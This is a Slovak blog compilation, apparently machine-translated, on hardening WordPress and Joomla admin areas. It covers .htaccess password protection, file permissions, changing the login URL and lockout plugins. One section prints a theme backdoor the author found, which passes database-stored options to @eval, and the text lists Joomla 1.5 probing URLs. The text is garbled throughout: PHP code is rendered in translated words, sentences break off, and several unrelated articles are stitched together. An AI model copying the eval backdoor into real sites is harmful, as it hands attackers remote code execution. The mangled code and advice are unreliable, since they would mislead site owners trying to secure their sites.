Chránime a skrývame panel správcu cez .htaccess. Ako chrániť svoje prihlasovacie údaje správcu WordPress? Primitívne a WPS Hide Login Vlastný názov WP

Dobrý deň, milí čitatelia blogu. Dnes chcem hovoriť o bezpečnosti práce a niektorých metódach ochrany stránky pred hackovaním. Žiaľ, nie som v tejto oblasti odborník a moje vedomosti sú len málo za hranicou článku o, ale opíšem len moju nedávnu skúsenosť. Nepoužil som nič náročné, ale dúfam, že to zvýši bezpečnosť práce s mojimi stránkami.

Bude to o dvojité overenie pre vstup do panela správcu motora vaše stránky (mali by fungovať na akomkoľvek CMS, ale osobne som kontroloval iba WordPress a Joomla). Ochrana je nastavená na úrovni servera, preto všetky pokusy o brutálne vynútenie hesla pre admin panel (brute force) nespôsobia zvýšenú záťaž na hosting a je dosť ťažké to obísť. Dá sa jednoducho vložiť (doslova v niekoľkých krokoch) a zo všetkých vedomostí vyžaduje len starostlivosť a možnosť prístupu na web cez FTP.

Uvediem aj pár akcií, ktoré som aplikoval na stránky na už zastaraných motoroch Joomla 1.5, na ktoré v skutočnosti nepotrebujem prenášať, ale ktoré neustále porušujem a používam server na odosielanie spamu. Popísané akcie som vykonal nedávno, takže nemôžem uviesť skutočnosť zastavenia infekcie stránok vírusmi, ale dúfam, že áno. Vo všeobecnosti som sa trochu snažil zlepšiť odolnosť Joomla 1.5.

Ako chrániť Joomla 1.5 pred hackovaním a prienikom vírusov

Ako som spomenul vyššie, problémom je neustále hackovanie dvoch mojich stránok, na ktorých beží Joomla 1.5. Môžete ich považovať za opustené, pretože k nim nepridávam nové materiály, ale pravidelne prinášajú príjmy (z umiestňovania článkov z Miralinks a Webartex, ako aj odkazov z Gogetlinks). Vo všeobecnosti je škoda ich vyhodiť, ale preniesť ich na novú verziu motora „na šrot“ (ospravedlňujeme sa za vynaložený čas a námahu).

Zostáva len neustále monitorovať zaťaženie servera a keď sa zvýši, hľadať medzi súbormi enginu shelly a iný malvér, alebo nejako posilniť ochranu. Aby som vyhľadal malvér, stiahnem si súbory motora do počítača a skontrolujem ich pomocou DoctorWeb a Aibolit. Prvý nájde ďaleko od všetkého a druhý vidí nepriateľa príliš často tam, kde nie je, ale nepoznám iné účinné metódy. Síce, programov sú tiež desiatky, ale pre niekoho je to pohodlnejšie.

Mimochodom, scenár Aibolit vie pracovať nielen na serveri, ale aj priamo na počítači v priečinku so stiahnutými súbormi enginu (len nezabudnite pri sťahovaní stránky vypnúť štandardný antivírus, pretože môže niektoré súbory rozsekať, ale stále zostanú na serveri).

Podrobný návod je uvedený vo videu nižšie, no v skratke si PHP interpret stiahnete zo stránky Microsoftu a nainštalujete. Potom otvorte súbor skriptu Aybolit ai-bolit.php pomocou tohto tlmočníka:

Rýchlosť indexového prehľadávania závisí od rýchlosti vášho počítača a počtu súborov v motore vašej lokality. Stránka https: // mi zabrala niekoľko hodín, pretože aj Aibolit má podozrenie, že obrázky ukrývajú vírusy, a práve týchto obrázkov mám veľa a súbory vyrovnávacej pamäte zaberajú veľa času počas skenovania. Pre stránky na Joomla 1.5 bola kontrola oveľa rýchlejšia.

Rozhodol som sa stráviť deň hľadaním spôsobov, ako zlepšiť bezpečnosť stránok. Podarilo sa nám urobiť veľmi málo, ale stále lepšie ako nič. Začnime s posilnenie ochrany (zníženie zraniteľnosti) dvoch stránok na Joomla 1.5... Urobilo sa nasledovné:

Ako inak chrániť Joomla 1.5 pred vírusmi a hackingom streamovania

1. "Odborníci" tiež uisťujú, že stránky na Joomla 1.5 sú nefunkčné "pre jedného alebo dvoch" pomocou jedného, ​​​​ktorého je k dispozícii v motore (údajne prostredníctvom neho môžete zmeniť heslo správcu). Aj keď na svojom webe nepoužívate registráciu a nikde nezobrazujete odkaz na obnovenie, neznamená to, že ste túto chybu zabezpečenia zakryli. Stačí pridať nasledujúci úryvok na adresu URL domovskej stránky vašej lokality a získate funkciu, ktorú hľadáte: /index.php?option=com_user&view=reset

   V skutočnosti, ak chcete túto medzeru uzavrieť (stále som nerozumel, ako ju použiť na hackovanie), môžete takýto súbor jednoducho odstrániť:

   /components/com_user/models/reset.php Potom už nikto z používateľov zaregistrovaných na vašej stránke nebude môcť používať funkciu obnovenia hesla, ale pre mňa to nebolo dôležité, pretože žiadna registrácia nebola.

2. A tiež hovoria, že taká užitočná shnyaga, ako pridaním na adresu stránky, tiež umožňuje autorom vírusov a lovcom pre dobro niekoho iného dostať sa do niektorých citlivých oblastí vašej stránky a zaviesť do nej deštruktívne alebo ho nejako inak zneužiť. Táto vec sa opäť odstráni úpravou jedného zo súborov motora. /libraries/Joomla/application/module/helper.php

   Tam musíte vymazať dva kusy kódu alebo zakomentovať ich a uzavrieť ich do / * a * / (tento kód jazykový tlmočník nespustí). Prvý úryvok je takýto:

   If (počet (výsledok $) == 0) (if (JRequest :: getBool ("tp")) ($ výsledok = JModuleHelper :: getModule ("mod _". $ Pozícia); $ výsledok-> názov = $ pozícia ; $ výsledok-> obsah = $ pozícia; $ výsledok-> pozícia = $ pozícia;))

   A druhý je takýto:

   If (JRequest :: getBool ("tp")) ($ attribs ["style"]. = "Outline";)

   V skutočnosti potom vyprázdnite vyrovnávaciu pamäť a pokúsite sa zobraziť pozície modulov vo vašej šablóne pomocou nasledujúcej konštrukcie:

   Https: // stránky /? Tp = 1

   Ak to nevyšlo, tak ste túto dieru dúfajme zatvorili.

3. Stránky sú veľmi často hacknuté nie zvonku, ale zvnútra. Trójske kone a keylogény vo vašom počítači preto vedia, čo hľadať a kde neuchovávajte heslá v FTP klientoch(pre tento prípad existuje možnosť použiť.) Ešte chladnejšie je zakázať možnosť prístupu na váš web cez FTP a namiesto toho tam, kde sú prenášané informácie (vrátane hesiel) šifrované, takže je zbytočné ich zachytávať. Úprimne povedané, zanedbávam poslednú radu kvôli svojej "temnosti". Existuje aj možnosť konfigurácie prístupu na vašu stránku cez bežné FTP len z konkrétnej IP adresy (vášho počítača), ale môj poskytovateľ internetu má dynamickú IP (mení sa v určitom rozsahu).
4. Tiež poradiť motora nie vyššie ako tie, ktoré sú skutočne potrebné na jeho prácu. V skutočnosti som o šablóne príliš nepremýšľal: 755 pre priečinky a 644 pre súbory. môžete robiť všetko s pomocou rovnakého Filezila. Okrem toho sa tieto práva musia vzťahovať nielen na adresáre koreňového priečinka, ale aj na všetky adresáre a súbory, ktoré sa v nich nachádzajú.

   

   Pre súbory v koreňovom priečinku som nastavil oprávnenia na 444 a pre adresáre tmp a logs 705. Mohlo to byť, samozrejme, prísnejšie "upnuté", ale nemám s tým žiadne konkrétne skúsenosti a čas strácať čas experimentmi. A okrem toho, to všetko nebude veľmi vážne odrádzať hackerov, pretože existuje niečo, čo všetko naše úsilie môže priniesť nazmar. Ak to chcete urobiť, použite podobné príkazy:

   Preto pre úplné „zabetónovanie“ súborov motora Joomla 1.5 pred hackovaním a zásahmi je potrebné zakázať zmenu prístupových práv k súborom a priečinkom prostredníctvom PHP. Robí sa to v nastaveniach servera, ale ešte neviem ako a kde. Ak viete, pošlite odkaz.

5. Všetky vyššie uvedené sú navrhnuté tak, aby znížili pravdepodobnosť hacknutia vašej stránky a prieniku shellov a iného škodlivého softvéru. Avšak prijaté opatrenia nie sú zaručené, takže by to bolo skvelé na serveri (kde žije vaša stránka Joomla 1.5). Tým sa odstráni všetka negativita z uniknutej skazenosti. Osobne som to však z dôvodov mojej „neprehľadnosti“ ešte nerealizoval. Bol by som vďačný za odkazy na materiály, ktoré tento proces vysvetľujú.

Stránky sú veľmi často prerušené získaním prístupu k administratívnemu panelu. Je jasné, že je zaheslovaný, a preto s použitím hrubej sily (smart brute force) mnohé, aj zdanlivo zložité heslá raz dva prelomia. Preto je potrebné chrániť aj panel správcu a je lepšie to urobiť nie pomocou ďalších rozšírení, ale pomocou servera. Existuje niekoľko možností ochrany. Napríklad môžete zmeniť adresu URL admin panela tak či onak, aby cracker nemohol začať svoj špinavý biznis.

Ďalším spôsobom ochrany, ktorý bude podrobne popísaný nižšie, je vytvorenie dodatočnej bariéry v ceste útočníka (živej osoby alebo skriptu). Spočíva v zaheslovaní adresára so súbormi admin (v Joomle je to priečinok správcu a vo WordPress - wp-admin) pomocou webového servera. Ukazuje sa, že pri prístupe k administračnému panelu musíte najprv zadať prihlasovacie meno a heslo na prístup k priečinku a až potom prihlasovacie meno a heslo na prístup k administračnému panelu motora. Navyše, prelomením prvej obrannej línie pomocou metód hrubej sily nevytvorí malvér žiadne významné dodatočné zaťaženie servera, čo je dobré.

6. Ďalšou veľmi dôležitou poznámkou k zvýšeniu ochrany vašich stránok pred hackingom a vírusovou infekciou je podľa mňa dodržiavanie pravidla: jedna stránka – jeden hostingový účet... Áno, je to drahšie, ale oveľa bezpečnejšie. Po umiestnení na jeden účet budú všetky vaše stránky dostupné cez FTP naraz, keď malvér získa prístup iba k jednej z nich. Automaticky prerušujú stránky a bolo by nerozumné dúfať, že skripty neprejdú v strome adresárov. Okrem toho je veľmi ťažké liečiť veľa stránok na jednom hostingovom účte, pretože vykonaním jednej stránky stratíte zo zreteľa už vyliečenú stránku, ktorá je v tomto čase infikovaná.
7. Mimochodom, môžu sa zlomiť nielen z vašej vlastnej stránky, ale aj zo stránky vášho hostiteľského suseda, ak sa majitelia riadne nepostarali o vylúčenie tejto možnosti. Hostingový panel môže byť tiež hacknutý (ako,), ale v každom prípade je počet hackov spôsobených chybou hostiteľa mizivý v porovnaní s počtom hackov v podobe neopatrnosti vlastníkov stránok.

Ako ochrániť administrátorský panel vášho webu pred hackermi?

Chcem podrobne hovoriť o metóde ochrany, ktorú som nedávno použil. Spočíva v odmietnutie prístupu k priečinkom, v ktorých sa nachádzajú súbory administratívneho panela lokality... Zákaz sa nastavuje pomocou úžasného súboru .htaccess, ktorý vám v skutočnosti umožňuje na diaľku ovládať nastavenia webového servera, na ktorom je vaša stránka nainštalovaná. Navyše vie, ako to urobiť selektívne.

Všetky smernice napísané v .htaccess sa budú vzťahovať výlučne na adresár, v ktorom sa nachádza. Chcete zmeniť nastavenia pre celý web? Potom umiestnite .htaccess do koreňového priečinka. Nás zaujímajú len nastavenia týkajúce sa priečinka so súbormi admin, tak to tam dáme. V Joomle to bude priečinok správcu, vo WordPresse to bude wp-admin.

Jeden .htaccess nám však nestačí. Budeme musieť použiť aj .htpasswd, kde bude uložené prihlasovacie meno a heslo pre prístup do tohto veľmi administratívneho priečinka. Heslo navyše nebude uložené ako čistý text, ale vo forme MD5 šifry. Heslo z nej nebude možné obnoviť, ale keď do poľa heslo zadáte správnu kombináciu, webový server vypočíta sumu za túto kombináciu MD5 a porovná ju s tým, čo je uložené v .htpasswd. Ak sa údaje zhodujú, potom vám bude povolený vstup do oblasti správcu Joomla alebo WordPress, a ak nie, nebude vám povolený.

To je všetko, zostáva len uviesť do života to, čo bolo naplánované. Koniec koncov, musíte pridať nejaké smernice do .htaccess. Viete ktoré? Neviem. A nejako bude potrebné predbehnúť heslo v poradí MD5. Problém. Má to však celkom jednoduché riešenie. Milí ľudia zorganizovali online službu na generovanie obsahu pre súbory .htaccess a .htpasswd na základe vášho prihlasovacieho mena a hesla. Je pravda, že musíte zadať aj absolútnu cestu k administratívnemu priečinku, ale to sú maličkosti.

Takže vitajte - skvelé a hrozné generátor ochrany pre oblasť správy vašich webových stránok... Rozumiem, však? Vymyslíte, a čo je najlepšie, na niektorom vytvoríte dve zložité kombinácie písmen, číslic a znakov, ktoré potom zadáte do dvoch horných políčok. Len si ich nezabudnite zapísať, prípadne natlačiť do správcu hesiel, inak sa sami do admin panelu nedostanete a všetko popísané v tejto časti budete musieť začať robiť odznova.

Tu, teraz. Vieš toto? Aj keď nevieš, nevadí. Pripojte sa k stránke cez FTP, vytvorte v jej koreňovom adresári súbor s ľubovoľným názvom (aj s touto url_path.php) a pridajte k nemu nasledujúci jednoduchý kód:

"; echo" Úplná cesta a názov skriptu: ". $ _ SERVER [" SCRIPT_FILENAME "]."
"; echo" Názov skriptu: ". $ _ SERVER [" SCRIPT_NAME "];?>

Potom prejdite do prehliadača a do panela s adresou zadajte túto adresu URL (samozrejme s vašou doménou):

Https://site/url_path.php

V dôsledku toho uvidíte absolútnu cestu, ktorá vás zaujíma. Zadajte ho do vyššie uvedeného generátora pre súbory .htaccess a .htpasswd. Nezabudnite pridať názov priečinka správcu alebo wp-admin na koniec tejto cesty bez koncovej lomky. To je všetko, teraz kliknite na tlačidlo "Generovať".

A následne preneste obsah súborov .htaccess a .htpasswd priamo do tých istých súborov.

Dúfam, že ste ich už vytvorili v priečinkoch správcu alebo wp-admin (v závislosti od používaného nástroja)?

Teraz skúste prejsť na panel správcu. Zobrazí sa okno s výzvou na zadanie prihlasovacieho mena a hesla z vášho webového servera? V rôznych prehliadačoch sa vykresľuje inak, ale v prehliadači Chrome to vyzerá takto:

Ak sa niečo neprilepí, potom „vyfajčite“ absolútnu cestu k .htpasswd, zadanú v súbore .htaccess. V takom prípade ho pri úprave súboru manuálne opravte. To je všetko, čo som vám dnes chcel povedať. Ak chceš niečo pokarhať alebo pridať, tak choď.

Vírus vo WordPresse?

Po napísaní tohto článku som na svojom blogu (https: // stránke) objavil malvér (alebo niečo, čo bolo nainštalované mimo moju vôľu). Chcel som len niečo zmeniť v kóde a vliezol som do toho. Úplne dole, tesne pred značkou Body, ma zasiahlo volanie nejakej neznámej funkcie (podľa jej názvu, ale nenašiel som nič, čo by stálo za to):

Zdá sa, že meno je rozumné. Je pozoruhodné, že tri týždne pred tým som náhodou zistil, že mám novú tabuľku v databázach dvoch mojich blogov WordPress (https: // stránka a ďalšia). Jeho názov bol jednoducho úžasný - wp-config. Vyhľadávanie pomocou tohto mena opäť neprinieslo nič užitočné, pretože všetky odpovede boli spojené so súborom wp-config.php s rovnakým názvom.

Táto tabuľka sa veľmi rýchlo rozrástla (na stránke https: // až stovky megabajtov) a zapisovali sa do nej adresy stránok môjho webu s rôznymi parametrami. Nepochopiac podstatu tohto procesu, jednoducho som tento stôl zdemoloval a hotovo. Mimochodom, mám ďalší blog na WordPresse, ale nič také tam nebolo pozorované.

No a tu som našiel takú "hovoriacu" vložku do témy. Rozhodol som sa zistiť, či tam nebolo pridané niečo, čo by ladilo s riadkom v spodnej časti päty opísanej vyššie. Ukázalo sa, že bolo pridané. A tak pekne - ani úplne hore, ani úplne dole, ale druhý (alebo tretí) zhora s napísanou funkciou:

Funkcia wp_custom_page_links_return () (volba $ = get_option ("wp_custom_page_links"); @eval (volba $);) @eval (get_option ("wp_brlinks"));

Tu, a nádherný "eval" bije do očí. Čo je pozoruhodné, Aibolitovi (popísanému vyššie) sa tento fragment zdal podozrivý, ale stále som ho nedostal do rúk, pretože tento skript mnohých podozrieva z jeho nespoľahlivosti. Tiež som googlil o tomto kóde a našiel som príspevok (bohužiaľ teraz bola doména zablokovaná pre neplatenie) s popisom podobného problému. Tento muck unikol od kamaráta s novou témou, do ktorej bol všitý akýsi inštalačný kód.

Na oboch infikovaných blogoch mám témy už dlhé roky. Pravdepodobne sa v motore vyskytla nejaká zraniteľnosť, ktorú okamžite (na streame) zneužili neprajníci. Vo všeobecnosti si overte, či takéto inklúzie neexistujú. Termín úpravy popisovaných súborov pripadol podľa mňa na polovicu septembra tohto roku.

Tiež vám odporúčam pozrieť si výber 17 video tutoriálov o zabezpečení stránok na Joomle... Automaticky sa prehrajú jedna po druhej a ak chcete, môžete prepnúť na ďalšiu lekciu pomocou príslušného tlačidla na paneli prehrávača alebo vybrať požadovanú lekciu z rozbaľovacej ponuky v ľavom hornom rohu okna prehrávača:

Príjemné pozeranie!

Veľa šťastia! Uvidíme sa čoskoro na stránkach blogu

Možno vás bude zaujímať

Stránka Joomla začala vydávať množstvo chýb ako - Strict Standards: Nestatická metóda JLoader :: import () by sa nemala volať staticky v
Aktualizácia Joomla na najnovšiu verziu
Vytvorenie mapy pre stránku Joomla pomocou komponentu Xmap
Čo je Joomla
Skupiny používateľov v Joomle, nastavenia vyrovnávacej pamäte a problém odosielania pošty zo stránky
Komponent K2 na vytváranie blogov, katalógov a portálov na Joomle - funkcie, inštalácia a rusifikácia
Moduly v Joomle - prezeranie pozície, nastavenie a zobrazovanie, ako aj priraďovanie prípon tried
Ako aktualizovať statickú stránku Html na dynamickú na Joomla
Nainštalujte si WordPress v detailoch a obrázkoch, prihláste sa do WP admin a zmeňte heslo
Zásuvné moduly Joomla – TinyMCE, Load Module, Legacy a iné sú štandardne nainštalované

Pravdepodobne už viete, ako sa dostať do oblasti správy WordPress?

Môžete to urobiť aspoň štyrmi spôsobmi, a to tak, že na adresu svojho webu pridáte nasledujúce:

1. / admin, t.j. takto: http: // yoursite / admin
2. / wp-admin
3. / Prihlásiť sa
4. /wp-login.php

Vo všeobecnosti všetky tri prvé možnosti presmerovaním (presmerovaním) vás aj tak zavedú na stránku: http: //your_site/wp-login.php

Ukazuje sa, že ktokoľvek môže pridať ktorúkoľvek zo štyroch vyššie opísaných predpôn k adrese vášho webu a zobraziť prihlasovacie údaje správcu:

To samozrejme vôbec neznamená, že sa do admin panelu môže ľahko dostať ktokoľvek, pretože potrebuje poznať aj Používateľské meno alebo váš e-mail a vaše heslo.

Ak má váš užívateľ-správca prihlasovacie meno: - tak to nie je z vašej strany vôbec prezieravé a útočníkovi stačí uhádnuť alebo uhádnuť vaše heslo.

Okrem toho vidíte nápis: Používateľské meno alebo e-mail? Áno, áno, je to e-mail, ktorý môže WordPress použiť ako používateľské meno. Ale niekde na stránke ste mohli zadať e-mailovú adresu, ktorá sa zhoduje s e-mailom administrátora. Ukazuje sa, že prvá vec, ktorú môže útočník skúsiť, je zadať váš e-mail a potom mu WordPress opäť pomôže, pretože ak sa e-mail nezmestí, zobrazí sa nasledujúca správa:

a ak je e-mail správny, WordPress napíše, že heslo k nemu nie je správne:

Výsledkom je situácia, v ktorej bude potenciálnemu útočníkovi stačiť uhádnuť alebo nájsť vaše heslo, aby mohol hacknúť vašu stránku (prístup k administračnému panelu).

Ako ochrániť vstup do administračného panelu pred potenciálnymi hrozbami? Odpoveď je jednoduchá – skúste zvýšiť počet neznámych potrebných na zadanie.

Teraz sa pozrime bližšie:

1. Ak je to možné, uistite sa, že E-mail administrátora nie je nikde na stránke uvedený - verejný E-mail by mal byť niečo iné.
2. Vaše heslo by nemalo byť jednoduché, pri inštalácii WordPress vám sám vygeneruje zložité heslo, ak ho nechcete použiť, vymyslite si nejaké viac či menej zložité heslo vrátane malých a veľkých znakov, číslic a niektorých symbolov ako -, ?, _ atď.
3. Vaše používateľské meno by tiež nemalo byť jednoduché, nie: admin, manažér, root, správca, používateľ a ďalšie jednoduché slová!
4. A nakoniec je potrebné zadať tretiu najdôležitejšiu neznámu - zmeniť prihlasovaciu adresu URL na panel správcu, na tento účel si nainštalujte jednoduchý plugin: WPS Hide Login

WPS Skryť prihlásenie

Jednoduchý, bezplatný a pomerne populárny plugin, ktorý vám umožní zmeniť prihlasovaciu URL do admin oblasti.

Po inštalácii a aktivácii doplnku musíte prejsť do sekcie správcu: Nastavenia / Všeobecné, potom prejdite na koniec stránky a pozrite si iba jeden parameter pridaný týmto doplnkom:

V predvolenom nastavení doplnok navrhuje použiť položku http: // yoursite / login - ale v žiadnom prípade to nie je najlepšia možnosť! Vymyslite si niečo vlastné, napr. yyy12_go)))

Po zmene tohto parametra nezabudnite kliknúť na tlačidlo Uložiť zmeny- inak, ak je plugin aktívny, budete mať prihlásenie cez http: // yoursite / login

Určite sa pokúste odísť a znova prejsť na panel správcu, ale na novej vstupnej adrese, ktorú ste si sami vymysleli, a čo je najdôležitejšie, nezabudnite na ňu!

Po zmene vstupného bodu na panel administrátora sa používateľovi pri pokuse o zadanie štandardných adries URL zobrazí chybová stránka 404.

Pozor! Ak náhle zabudnete novú prihlasovaciu adresu pre panel správcu, budete musieť tento doplnok zakázať. Ak máte prístup k priečinkom a súborom lokality, môžete to urobiť bez toho, aby ste museli prejsť na panel správcu. Stačí premenovať alebo odstrániť priečinok s doplnkami wps-hide-login, ktorý bude v priečinku pluginy(priečinok plugins sa nachádza v priečinku wp-content).

Výsledkom je, že po použití všetkých vyššie uvedených opatrení musíme získať ochranu pre vstup do administračného panela s tromi neznámymi: E-mail / Používateľské meno, zložité heslo a naša vlastná jedinečná prihlasovacia adresa URL - a to môže výrazne skomplikovať pokusy mladých hackerov)

Ahojte všetci v tomto návode. A po pravde, bude to krátke, ale užitočné, najmä pre začiatočníkov. Chlapci, poznáte štatistiku, koľko stránok je napadnutých, však? Môžem však povedať, že každý štvrtý už bol hacknutý, takže je to v súlade s tým, že autori blogov a nemocníc o tomto fakte vedia, a tak môže byť číslo oveľa menšie. Teraz budeme chrániť oblasť správcu WordPress, pretože toto je úplne prvá a najsilnejšia stena.

Predslov.

Ako vždy, trochu teórie. Vidíte, čo sa deje, všetci sme ľudia a naše správanie je rovnaké, a pokiaľ nás niekto na jednom mieste nepohryzie, nepotápame sa, dobre, mám pravdu? Ide o to, že stránka je napadnutá programom, ktorý funguje podľa svojich vlastných algoritmov, a ak vaša stránka týmto algoritmom ustúpi, napíšte to.

Zabezpečenie vašej stránky je úplne prvá vec, ktorú je potrebné urobiť, a to by ste mali vždy urobiť a skontrolovať. Väčšina administrátorov teda sama uľahčuje prácu crackerom, ako je opísané. Alebo jednoducho ukradli vaše heslá, napríklad z programu pre FTP pripojenie k vašej stránke.

Prečítajte si všetky články a chráňte sa a tiež vám odporúčam prelistovať si vírusy, je to tiež veľmi poučné.

Plugin pre obmedzenia autorizácie.

Volá sa Login LockDown, štandardne sa inštaluje, môžete priamo cez WordPress admin panel. Zadajte jeho názov do vyhľadávania a nainštalujte, ako na obrázku nižšie. On je jediný, koho nemôžete minúť.

Teraz je potrebné nakonfigurovať, v zásade nie je veľa nastavení, ale väčšina článkov na internete sa zvažuje na starších verziách tohto doplnku, kde ponúkajú robiť veľa už zbytočných vecí. Začnime tu je snímka obrazovky a pod ňou popis (pre pohodlie som ju rozdelil na dve časti)

1. Cesta k nastaveniam pluginu.
2. Maximálny počet opakovaní prihlásenia, to znamená počet pokusov, ktoré môže človek zadať, najlepšie som dal 3. Ak počas týchto troch pokusov nebol správny, prístup k vstupu je zablokovaný.
3. Dĺžka blokovania (minúty), na základe posledného bodu uvádzame v akom čase blokovanie vykonáme, medzi pokusmi o zadanie údajov nastavujem 1 minútu. Predpokladajme, že prejdete na panel správcu, ale prvýkrát sa to nepodarilo, potom sa ochrana panela správcu wordpress okamžite zapne a môžete pokračovať až po čase, keď ste sa tu zaregistrovali.
4. Dĺžka blokovania (minúty), plugin po niekoľkých zlyhaniach (nastavil som tri) vidí, že všetky pokusy o autorizáciu sú zbytočné a zablokuje ip používateľa, tu píšeme na aký čas, mám hodinu.
5. Uzamknúť neplatné používateľské mená? Počítajte počet pokusov pri zadaní nesprávneho prihlásenia, povinná položka.

1. Chyby pri prihlásení masky? Dali sme tiež áno, samozrejme. Všetko je to o samotnom WordPresse, sám si povie, že buď bolo nesprávne zadané prihlasovacie meno alebo heslo. A na skrytie týchto výziev je potrebná takáto položka.
2. Zobraziť odkaz na kredit?Štandardne, ak táto položka nie je zaškrtnutá, vypíše, že všetko stráži plugin Login LockDown. Aby sme nedávali zbytočné informácie, robíme toto nastavenie. V starých článkoch na internete sa odporúčalo ísť do kódu zásuvného modulu a robiť všetko ručne, ale čas plynie a túto funkciu implementovali samotní vývojári.
3. Ako všetci, kliknite na toto tlačidlo a uložte nastavenia.
4. Momentálne uzamknuté. A tu bude zoznam všetkých IP adries, ktoré sa pokúsili hacknúť stránku, alebo skôr, ktoré prekročili limit vstupu.

Záver.

Nepredstavujme si blog ako stacionárneho robota, na ktorý si prišiel, napísal, niečo zoptimalizoval a hotovo. Pamätaj na moje slovo

Správcovská časť je najzraniteľnejšia zo všetkých častí stránky. Keď sa sem útočník dostane, získa plný prístup k celej stránke a môže si robiť, čo chce (od jednoduchej správy, že stránka bola napadnutá, až po čiastočné narušenie alebo úplné odstránenie obsahu).

Prečo chrániť oblasť správcu?

Majitelia stránok často nepripisujú ochrane admin oblasti veľký význam, čo neskôr ľutujú, keď sa stanú obeťami hackingu. WordPress je pre svoju otvorenosť a obľúbenosť po celom svete pod drobnohľadom hackerov. Samozrejme, vývojári enginu rýchlo opravia nájdené bezpečnostné chyby, no rýchlo nájdu aj nové, z ktorých môžete trpieť, kým nebudú opravené.

Metódy ochrany

Existuje množstvo opatrení, ktorých prijatím budete môcť chrániť svoju stránku pred nespravodlivým vplyvom na slušnej úrovni.

Výber správneho prihlasovacieho mena / hesla správcu

Úplne prvým krokom k ochrane je správne prihlasovacie meno a heslo správcu. Dôrazne sa neodporúča používať ako používateľské meno admin alebo správca... Ak ste už vytvorili administrátora s „nechceným“ menom, bude to celkom jednoduché. Nezabudnite neskôr používateľa vymazať admin alebo správca.

Heslo musí mať 8 až 10 znakov a musí obsahovať malé/veľké písmená a čísla, ako aj ďalšie symboly (bodkočiarka, otáznik/výkričník atď.)

Zmeňte adresu administračného panela

V predvolenom nastavení WordPress používa nasledujúce adresy URL na prihlásenie do panela správcu:

Http://site.ru/wp-admin/ http://site.ru/wp-login.php

Vzhľadom na popularitu enginu sú tieto adresy dosť náchylné na útoky. Aby bola zaistená bezpečnosť celej lokality, mali by sa zmeniť na tie, ktoré budete poznať iba vy. Na tento účel existuje pomerne ľahko spravovateľný doplnok. Vďaka nemu si môžete sami nastaviť, na akej adrese získate prístup do admin panelu.

Inštalácia dodatočného autorizačného formulára cez .htaccess

Súbor .htaccess je zodpovedný za konfiguráciu webového servera Apache a umožňuje konfigurovať prevádzku servera v adresároch vašej stránky (napríklad zmeniť názov indexových súborov, nastaviť prístupové práva k súborom / adresárom, vykonať presmerovania). V tomto prípade súbor nainštaluje dodatočný formulár na zadanie používateľského mena a hesla pred vstupom do administračného panela na autorizáciu. S príkladmi, inštaláciou a konfiguráciou súboru .htaccess Môžete sa odhlásiť.

Ochrana administračného panela pred heslami hrubou silou

Ďalším dôležitým detailom ochrany admin panela je obmedzenie počtu zadávaných hesiel. Ak by sa teda útočník predsa len dostal k prihlasovaciemu formuláru na stránke a pokúsil sa uhádnuť heslo, bolo by logické po niekoľkých neúspešných pokusoch ho zablokovať. Na tento účel môžete použiť špeciálne doplnky. Jedným z nich je doplnok Limit Login Attempts. Na aktiváciu ochrany stačí nainštalovať a aktivovať doplnok.

výsledky

Prijatím vyššie uvedených opatrení budete môcť ochrániť váš administrátorský panel pred väčšinou možných zraniteľností: teraz bude pre útočníka ťažšie ho odhaliť a nájsť preň používateľské meno / heslo. To vám samozrejme nezaručuje 100% ochranu, keďže sa vždy objavia nové zraniteľnosti, ktoré narušia chod stránky. Ak však neurobíte žiadne kroky smerom k bezpečnosti, pravdepodobnosť zlyhania sa mnohokrát zvyšuje.

Bol som hacknutý. Viete, ako stránka na VKontakte. Neprosili však o peniaze, ale vytvorili veľa „ľavých“ stránok s odkazmi na rôzne stránky. Potom som premýšľal o ochrane môjho blogu. A našiel som ideálne riešenie.

Ako prvé som deň pred hacknutím kontaktoval technickú podporu so žiadosťou o obnovenie mojej stránky a po desiatich minútach som mal svoj normálny blog.

Potom som nainštaloval veľa doplnkov na ochranu WordPress pred hackovaním. Blog sa ale začal strašne spomaľovať. Stránky sa načítali za päť až desať sekúnd. Je príliš dlhá.

Začal som hľadať pluginy, ktoré až tak nezaťažia systém. Čítal som recenzie na tieto pluginy a čoraz častejšie som začal narážať na All In One WP Security. Podľa popisu sa mi veľmi páčila a rozhodla som sa ju dať na svoj blog. A chráni ma dodnes, lebo nič lepšie som ešte nestretla.

Čo všetko dokáže WP Security (všetko v jednom wordpress ochrana):

• Vytvára zálohy databázy, konfiguračného súboru wp-config. a súbor .htaccess
• Zmena adresy prihlasovacej stránky
• Skryje informácie o verzii WordPress
• Ochrana administračného panelu - blokovanie v prípade nesprávnej autorizácie
• Ochrana robotov
• A mnoho ďalších užitočných vecí

Môžem s istotou povedať, že doplnok All In One WP Security je najlepšou ochranou stránok wordpress.

Nastavenie zabezpečenia All In One WP

Keď prejdete do sekcie Nastavenia, prvá vec, ktorú musíte urobiť, je vytvoriť zálohy:

• databáza;
• súbor wp-config;
• súbor htaccess

Toto sa vykonáva na prvej stránke nastavení doplnku All In One WP Security.

Pred začatím práce urobte zálohu (zálohu).

Prejdem len tie najdôležitejšie body.

položky nastavení doplnku všetko v jednom zabezpečení wp

Ovládací panel

Tu nás víta počítadlo „Security Meter“. Ukazuje úroveň ochrany lokality. Vaša stránka by mala byť aspoň v zelenej zóne. Nie je potrebné naháňať maximálnu lištu - zbytočné nastavenia môžu narušiť funkčnosť stránky. Zaútočiť na strednú cestu.

Počítadlo ochrany stránok na wordpresse

Keď zmeníte nastavenia ochrany doplnku, v každej položke uvidíte zelený štít s číslami - to sú čísla, ktoré sa pridávajú do všeobecného bezpečnostného účtu.

číslo sa pripočíta k celkovému skóre bezpečnosti

nastavenie

Karta Informácie o verzii WP

Začiarknutím políčka Vymazanie metadát generátora WP.

Odstránenie metadát generátora WP

Deje sa tak tak, že v kóde sa nezobrazuje verzia enginu WordPress, ktorú máte nainštalovanú. Útočníci vedia, ktorá verzia obsahuje slabé miesta, a keďže poznajú verziu WordPress, ktorú máte nainštalovanú, budú môcť hacknúť váš web rýchlejšie.

Správcovia

Vlastný názov WP

Ak máte prihlasovacie meno na vstup do admin panela admin, určite ho zmeňte. Admin je najobľúbenejšie prihlásenie. Mnoho CMSC to ponúka štandardne a ľudia sú príliš leniví na to, aby to zmenili.
Útočníci používajú rôzne programy na hackovanie webových stránok. Tieto programy získavajú používateľské mená a heslá, kým nenájdu vhodnú kombináciu.
Preto nepoužívajte prihlasovacie meno správcu.

Zobraziť meno

Ak je vaša prezývka rovnaká ako vaše používateľské meno, nezabudnite zmeniť svoje používateľské meno alebo prezývku.

heslo

